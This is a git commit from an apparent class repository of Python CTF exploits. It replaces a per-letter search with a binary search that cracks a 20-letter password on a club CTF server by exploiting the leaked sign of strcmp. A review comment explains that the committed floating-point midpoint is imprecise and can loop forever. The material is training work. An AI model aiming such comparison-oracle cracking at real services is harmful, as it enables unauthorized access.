ucdavis-ecs189m

[RADIOACTIVE] python exploits for uc davis class ecs189m

commit e0e24040d866dc889eaa3c870d1698e2b8691e90
parent d566d297dfebd290f96b1a3ede24d8b9c629fea7
Author: therealFIGBERT <figbertwelner@gmail.com>
Date:   Thu, 10 Oct 2019 11:22:12 -0700

Replacing contents of third_flag.py with dad_flag.py

Diffstat:
Ddad_flag.py | 29-----------------------------
Mthird_flag.py | 120++++++++++++++++++++++++++++---------------------------------------------------
2 files changed, 43 insertions(+), 106 deletions(-)

diff --git a/dad_flag.py b/dad_flag.py
@@ -1,28 +0,0 @@
-from pwn import *
-
-def str_to_dec(s):
- num_vals = [(ord(char)-97) for char in s][-1::-1]
- lst = []
- for pos, val in enumerate(num_vals):
- lst.append(val*(26**pos))
- return sum(lst)
-
-def dec_to_str(num):
- st = ""
- for i in range(19,0,-1):
- digit = int(num/(26**i))
- char = chr(digit+97)
- st += char
- num -= digit*(26**i)
- char = chr(int(num)+97)
- st += char
- return st
-
-LO26 = "aaaaaaaaaaaaaaaaaaaa"
-HI26 = "yyyyyyyyyyyyyyyyyyyy"
-LO10 = str_to_dec(LO26)
-HI10 = str_to_dec(HI26)
-MID10 = (LO10 + HI10)/2
-print(dec_to_str(LO10))
-print(dec_to_str(HI10))
-print(dec_to_str(MID10))
-\ No newline at end of file
diff --git a/third_flag.py b/third_flag.py
@@ -1,84 +1,50 @@
-# A CTF exploit by Benjamin Welner
-# for the Davis Cyber Security Club server
-# at twinpeaks.cs.ucdavis.edu:30004
-# 29/09/2019
-#
-# Challenge:
-# I have a password that only has lowercase letters and has length 20.
-# Enter the password to get the flag.
 from pwn import *
-import itertools
-def pass_gen(char=None, pos=None, premade=None, first=False):
- password = ""
- if first:
- password = char
- for _ in range(0,19):
- password += "a"
- else:
- lst = [a for a in premade]
- lst[pos] = char
- for item in lst:
- password += item
- return password
+def str_to_dec(s):
+ num_vals = [(ord(char)-97) for char in s][-1::-1]
+ lst = []
+ for pos, val in enumerate(num_vals):
+ lst.append(val*(26**pos))
+ return sum(lst)
-def find_middle(lst):
- middle = float(len(lst))/2
- return int(middle - .5) if middle % 2 != 0 else int(middle-1)
+def dec_to_str(num):
+ st = ""
+ for i in range(19,0,-1):
+ digit = int(num/(26**i))
+ char = chr(digit+97)
+ st += char
+ num -= digit*(26**i)
+ char = chr(int(num)+97)
+ st += char
+ return st
-master_alphabet = ["a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z"]
-current_mid = find_middle(master_alphabet)
-previous_mid = current_mid
-alphabet = master_alphabet
-passkey = ""
-previous_pass = ""
-response = None
-previous_response = None
 cracked = False
-flipped = False
-start = 0
-
+attempt = 1
+LO26 = "aaaaaaaaaaaaaaaaaaaa"
+HI26 = "zzzzzzzzzzzzzzzzzzzz"
+LO10 = str_to_dec(LO26)
+HI10 = str_to_dec(HI26)
+MID10 = (LO10 + HI10)/2
+MID26 = dec_to_str(MID10)
 conn = remote("twinpeaks.cs.ucdavis.edu", 30004)
 print(conn.recv())
-passkey = pass_gen(first=True, char=alphabet[current_mid])
 while not cracked:
- while not flipped:
- conn.sendline(passkey)
- print("Current letters:\n%s"%alphabet)
- print("Pass sent as:\n%s"%passkey)
- previous_response = response if response is not None else None
- response = conn.recvline_contains(b"strcmp")
- print("Server response:\n%s"%response)
- last_response_was_small = True if b" -1 " in response else False
- if b" -1 " in response:
- alphabet = alphabet[current_mid:]
- previous_mid = current_mid
- current_mid = find_middle(alphabet)
- previous_pass = passkey
- passkey = pass_gen(char=alphabet[current_mid], pos=start, premade=passkey)
- if last_response_was_small:
- flipped = False
- else:
- flipped = True
- elif b" 1 " in response:
- alphabet = alphabet[:current_mid]
- previous_mid = current_mid
- current_mid = find_middle(alphabet)
- previous_pass = passkey
- passkey = pass_gen(char=alphabet[current_mid], pos=start, premade=passkey)
- if last_response_was_small:
- flipped = True
- else:
- flipped = False
- else:
- print("Password cracked as: %s"%passkey)
- cracked = True
- conn.interactive()
- # while len(alphabet) > 1:
- flipped = False
- alphabet = master_alphabet
- current_mid = find_middle(alphabet)
- if not last_response_was_small:
- response = previous_response
- passkey = previous_pass
- start += 1
-\ No newline at end of file
+ conn.sendline(MID26)
+ print("Attempt {}:\nPass sent as:\n{}\nCurrent low:\n{}\nCurrent high:\n{}\n".format(attempt, MID26, LO26, HI26))
+ attempt += 1
+ response = conn.recvline_contains(b"strcmp")
+ print("Server response:\n{}\n".format(response))
+ if b" -1 " in response:
+ LO26 = MID26
+ LO10 = str_to_dec(LO26)
+ MID10 = (LO10 + HI10)/2
+ MID26 = dec_to_str(MID10)
+ elif b" 1 " in response:
+ HI26 = MID26
+ HI10 = str_to_dec(HI26)
+ MID10 = (LO10 + HI10)/2
+ MID26 = dec_to_str(MID10)
+ else:
+ print("Password cracked as: {}".format(MID26))
+ cracked = True
+ conn.interactive()
+\ No newline at end of file
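Review bot: The midpoint in the new search loop is computed in floating point — `MID10 = (LO10 + HI10)/2` is a float, and `dec_to_str` continues with `num/(26**i)` and `int(num)` — but the key space is 26**20 (about 2e28, near 2^94), far beyond a float's 53-bit mantissa, so the last several letters of `MID26` are rounding noise (a digit can even land outside 0–25 and yield a non-letter), and once the bounds are within a few trillion of each other the rounded midpoint collapses onto `LO26` or `HI26` and the `while not cracked` loop resends the same guess indefinitely. Keep the whole search in integers: `MID10 = (LO10 + HI10) // 2` in all three places, and in `dec_to_str` `digit = num // (26**i)` with `char = chr(num + 97)` for the final letter. With integer bounds the loop also provably terminates, because after every `-1`/`1` answer the password stays strictly between `LO10` and `HI10` and the gap halves each round (roughly 94 attempts). The attack works only because the service leaks the sign of `strcmp` on every attempt; the `b" -1 "`/`b" 1 "` matching is inferred from that output format and should be confirmed against a captured response line before the bare `else` branch is trusted to mean "cracked". Also `conn.sendline(MID26)` passes a str, which newer pwntools releases on Python 3 may warn about or reject — `MID26.encode()` is the safe form.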